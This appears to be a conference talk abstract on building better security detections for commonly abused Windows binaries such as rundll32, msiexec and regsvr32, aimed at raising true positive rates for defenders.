Are you struggling to keep up with false positive alerts? Worried the alerts you ingest will never catch true evil? Are you responding to malicious activity well after occurrence, rather than detecting in real time? If you answered “yes” to any of the above, this discussion is for you. Through this talk, attendees will be equipped with a trusted process to more effectively detect malicious activity in their environment.

Focusing on system binaries that frequently facilitate the download or execution of malicious code (rundll32.exe, msiexec.exe, regsvr32.exe, etc.), publicly available resources will be leveraged to determine normal behavior versus malicious behavior. We’ll walkthrough how to answer questions such as: what are normal command line parameters, process paths, and process lineages? Should this binary be making network connections? What are known abuse techniques of this binary?

We’ll then dive into a handful of options for creating effective detection logic. Delving into examples of real world threats and techniques often utilized by red teams (i.e.,search order hijacking, process injection, privilege escalation), these detection ideas will allow defenders to create alerts that have more meaning and a higher true positive rate.